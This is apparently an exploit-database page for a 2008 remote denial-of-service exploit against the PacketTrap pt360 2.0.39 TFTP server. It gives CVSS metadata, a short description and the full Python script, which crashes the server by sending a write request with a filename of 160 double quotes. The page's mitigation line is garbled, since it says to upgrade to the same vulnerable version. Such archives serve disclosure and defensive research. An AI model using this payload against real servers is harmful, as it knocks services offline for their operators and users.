header-logo
Suggest Exploit
vendor:
pt360
by:
Mati Aharoni
7.5
CVSS
HIGH
Remote Denial of Service
400
CWE
Product Name: pt360
Affected Version From: 2.0.39
Affected Version To: 2.0.39
Patch Exists: Yes
Related CWE: N/A
CPE: a:packettrap:pt360
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2008

PacketTrap Networks pt360 2.0.39 TFTPD Remote DOS

This exploit is used to cause a denial of service in PacketTrap Networks pt360 2.0.39 TFTPD. It sends a crafted packet with a filename of 160 double quotes to the server, which causes the server to crash.

Mitigation:

Upgrade to the latest version of PacketTrap Networks pt360 2.0.39 TFTPD.
Source

Exploit-DB raw data:

#!/usr/bin/python
# PacketTrap Networks pt360 2.0.39 TFTPD Remote DOS 
# Coded by Mati Aharoni
# muts..at..offensive-security.com
# http://www.offensive-security.com/0day/pt360dos.py.txt

import socket
import sys

host = '172.16.167.134'
port = 69

try:
   s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
   print "socket() failed"
   sys.exit(1)

filename = '"'*160
mode = "netascii"
muha = "\x00\x02" + filename + "\0" + mode + "\0"
s.sendto(muha, (host, port))

# milw0rm.com [2008-03-26]

Navigation

Suggest Exploit

Services By CQR